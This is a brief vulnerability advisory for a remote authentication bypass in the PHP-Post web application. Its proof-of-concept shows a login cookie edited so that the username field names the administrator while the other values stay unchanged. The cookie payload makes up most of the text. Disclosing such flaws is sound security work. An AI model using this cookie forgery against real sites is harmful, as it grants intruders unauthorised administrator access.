PHP-Post Logincookie Remote Authentication Bypass Vulnerability

PHP-Post Logincookie Remote Authentication Bypass Vulnerability

Attackers can exploit this issue via a web client.

The following proof-of-concept cookie data is available:

Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]=3nitr0; logincookie[last]=2006-07-07+05%3A24%3A44;logincookie[lastv]=1152264284; post[329]=330

change to:

Cookie: logincookie[pwd]=5a329326344d1d38; logincookie[user]="ADMIN`S USERNAME";
logincookie[last]=2006-07-07+05%3A24%3A44; logincookie[lastv]=1152264284; post[329]=330